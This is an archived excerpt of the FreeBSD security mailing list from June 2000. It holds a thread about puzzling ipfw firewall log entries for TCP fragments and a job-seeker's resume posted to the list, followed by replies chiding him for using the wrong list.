Chris Dillon Cc: Mike Tancsa , Ian Smith , freebsd-security@FreeBSD.org, brian@hak.lan.awfulhak.org, luigi@FreeBSD.org Subject: Re: ipfw log entry In-Reply-To: Message from Chris Dillon of "Fri, 16 Jun 2000 16:16:08 CDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 16 Jun 2000 22:48:02 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Fri, 16 Jun 2000, Mike Tancsa wrote: > > > At 05:14 AM 6/17/00 +1000, Ian Smith wrote: > > >As I mentioned to John, this host is res6.geocities.com. We see these > > >here usually in big batches, perhaps about once a month on average, eg: > > > > > >May 22 18:14:39 gaia /kernel: > > > ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147 > > > > I thought I recognized that IP address... > > > > ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147 > > ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147 > > > > Sheesh! We lots of this in our logs as well. > > Ditto. I get these quite often. > > ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147 > ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147 > ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147 > > Anyone figured out what/who this is yet? It's a problem in the firewall code - I think because of assumptions about minimum lengths of packets. I didn't figure this out, but I talked to luigi@ about it a couple of weeks ago. > -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net > FreeBSD: The fastest and most stable server OS on the planet. > For Intel x86 and Alpha architectures. ( http://www.freebsd.org ) -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 17 7:52:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from albqpop1.albq.uswest.net (albqpop1.albq.uswest.net [207.108.240.1]) by hub.freebsd.org (Postfix) with SMTP id D8C8A37B5CE for ; Sat, 17 Jun 2000 07:52:16 -0700 (PDT) (envelope-from jlschwab@uswest.net) Received: (qmail 41472 invoked by alias); 17 Jun 2000 14:52:09 -0000 Delivered-To: fixup-freebsd-security@freebsd.org@fixme Received: (qmail 41290 invoked by uid 0); 17 Jun 2000 14:52:03 -0000 Received: from dialupb194.albq.uswest.net (HELO ws) (207.224.147.194) by albqpop1.albq.uswest.net with SMTP; 17 Jun 2000 14:52:03 -0000 Message-ID: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> From: "Jason L. Schwab" To: , Subject: Resume... Date: Sat, 17 Jun 2000 08:47:05 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_002F_01BFD838.9D0CE760" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_002F_01BFD838.9D0CE760 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello Everyone; Hi. My name is Jason L. Schwab. How are you doing today? Well first of all, let me tell you a lilttle about my self. I am 17 years of age. I am located in Albuquerque, New Mexico, USA. I have just over 5 years of Unix and Linux expereince. I am looking to get alot more expereince in the internet and/or unix servers area. I am looking todo=20 this by working for an Internet Service Provder. The list below contains a very small portion of my capabilities. - Perl Programming - C/C++ Programming - HTML Programming - CGI Programming - Apache (Complete Configuration) - DNS / BIND / NAMED Primary/Secondary - Mail Servers (postfix/sendmail/qmail) - FTP Servers (wuftpd/ncftpd/proftpd/ftpd-bsd) - SSH (of course ;)) - syslogd (logging to outside hosts) - Kernels and System Upgrades - Security Knowledge (tripwire/kern.securelevel) - Firewalls and Networking - Windows 95/98 Tech. Support - Unix/Linux Tech. Support (*BSD/Linux Only) There is alot more items on that list! Its just a small part of my capabilities, and I am learning more by the day. One of my favorite hobbies of mine is remote unix administration, I think its the best job any one could ever have, so yes I am willing todo remote unix administration. I am looking todo mainly networking and security. =20 As far as my security knowledge is, I have been doing unix and linux security for just over 3 years now. In this time period I have never had = a security problem ever. Just to test my own security knowledge, I hosted a machine running BSD and I gave out a public account on it, I emailed=20 every unix and linux security mailing list with the login information I had over 500 people trying to breach my security and for the three = months=20 I ran it, no one, not a single person compromised that machine. I have worked for an Internet Service Provider before, NMIA.COM, New Mexico Internet Access, which was strickly temporary employment which is why I no longer work there. I was doing Client Firewalling, = Unix=20 Programming and alot of misc. tasks. =20 I consider my self a professional unix system administrator. I have = ran two small web hosting companies for friends of mine, I have helped administrate about a total of 10 small web hosting and unix shell=20 account servers worldwide. So I have a wide range of expereince within the unix and linux area. Sincerely, Jason L. Schwab - jlschwab@uswest.net ------=_NextPart_000_002F_01BFD838.9D0CE760 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello Everyone;

  Hi. My name is Jason L. = Schwab. How are=20 you doing today?

  Well first of all, let me tell you a = lilttle=20 about my self. I am 17
years of age. I am located in Albuquerque, New = Mexico,=20 USA. I have just
over 5 years of Unix and Linux expereince. I am = looking to=20 get alot more
expereince in the internet and/or unix servers area. I = am=20 looking todo
this by working for an Internet Service = Provder.

 =20 The list below contains a very small portion of my=20 capabilities.

   - Perl Programming
   - = C/C++=20 Programming
   - HTML Programming
   - CGI=20 Programming
   - Apache (Complete = Configuration)
   -=20 DNS / BIND / NAMED Primary/Secondary
   - Mail Servers=20 (postfix/sendmail/qmail)
   - FTP Servers=20 (wuftpd/ncftpd/proftpd/ftpd-bsd)
   - SSH (of course=20 ;))
   - syslogd (logging to outside hosts)
   = -=20 Kernels and System Upgrades
   - Security Knowledge=20 (tripwire/kern.securelevel)
   - Firewalls and=20 Networking
   - Windows 95/98 Tech. Support
   = -=20 Unix/Linux Tech. Support (*BSD/Linux Only)

   There is = alot=20 more items on that list! Its just a small part of my
capabilities, = and I am=20 learning more by the day. One of my favorite
hobbies of mine is = remote unix=20 administration, I think its the best job
any one could ever have, so = yes I am=20 willing todo remote unix
administration. I am looking todo mainly = networking=20 and security.
 
   As far as my security knowledge = is, I=20 have been doing unix and linux
security for just over 3 years now. In = this=20 time period I have never had a
security problem ever. Just to test my = own=20 security knowledge, I hosted
a machine running BSD and I gave out a = public=20 account on it, I emailed
every unix and linux security mailing list = with the=20 login information I
had over 500 people trying to breach my security = and for=20 the three months
I ran it, no one, not a single person compromised = that=20 machine.

   I have worked for an Internet Service = Provider=20 before, NMIA.COM,
New Mexico Internet Access, which was strickly = temporary=20 employment
which is why I no longer work there. I was doing Client=20 Firewalling, Unix
Programming and alot of misc. = tasks.
 
  I=20 consider my self a professional unix system administrator. I have = ran
two=20 small web hosting companies for friends of mine, I have = helped
administrate=20 about a total of 10 small web hosting and unix shell
account servers = worldwide. So I have a wide range of
expereince within the unix and = linux=20 area.

Sincerely,
Jason L. Schwab - jlschwab@uswest.net


 ------=_NextPart_000_002F_01BFD838.9D0CE760-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 17 10: 6: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 4032E37B5C6; Sat, 17 Jun 2000 10:06:02 -0700 (PDT) (envelope-from alex@wnm.net) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e5HH8QY83097; Sat, 17 Jun 2000 12:08:26 -0500 (CDT) Date: Sat, 17 Jun 2000 12:08:26 -0500 (CDT) From: Alex Charalabidis To: "Jason L. Schwab" Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Resume... In-Reply-To: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 17 Jun 2000, Jason L. Schwab wrote: > Hello Everyone; > > Hi. My name is Jason L. Schwab. How are you doing today? > For all your supposed professional skills, you are not capable of posting to an appropriate mailing list... Go read the list of FreeBSD mailing lists again and notice how there is one that suits the purpose. -ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 Systems Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 17 10:48:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from stingray.ivision.co.uk (avengers.ivision.co.uk [212.25.224.7]) by hub.freebsd.org (Postfix) with ESMTP id 01F6837B64F; Sat, 17 Jun 2000 10:48:09 -0700 (PDT) (envelope-from manar@ivision.co.uk) Received: from [212.25.224.17] (helo=pretender2) by stingray.ivision.co.uk with smtp (Exim 2.04 #1) id 133MhD-000285-00; Sat, 17 Jun 2000 18:47:51 +0100 Message-Id: <3.0.5.32.20000617184621.026e2cd0@stingray.ivision.co.uk> X-Sender: manarpop@stingray.ivision.co.uk X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 17 Jun 2000 18:46:21 +0100 To: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG From: Manar Hussain Subject: Re: Resume... In-Reply-To: References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> Hi. My name is Jason L. Schwab. How are you doing today? >> >For all your supposed professional skills, you are not capable of posting >to an appropriate mailing list... Go read the list of FreeBSD mailing >lists again and notice how there is one that suits the purpose. I'm sure this is unfair but I have to say that the cluelessness of sending it to -isp and -security rather than -jobs made me immediately wonder if it was a scam. I mean what better way to gain access to someone's network / systems than to have them explain it to you and give you root :). Manar -- Manar Hussain, Director Email: manar@ivision.co.uk Mobile: (07971) 277821 Internet Vision Tel: 020 7589 4500 60 Albert Court Fax: 020 7589 4522 Prince Consort Road info@ivision.co.uk London. SW7 2BE http://www.ivision.co.uk/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message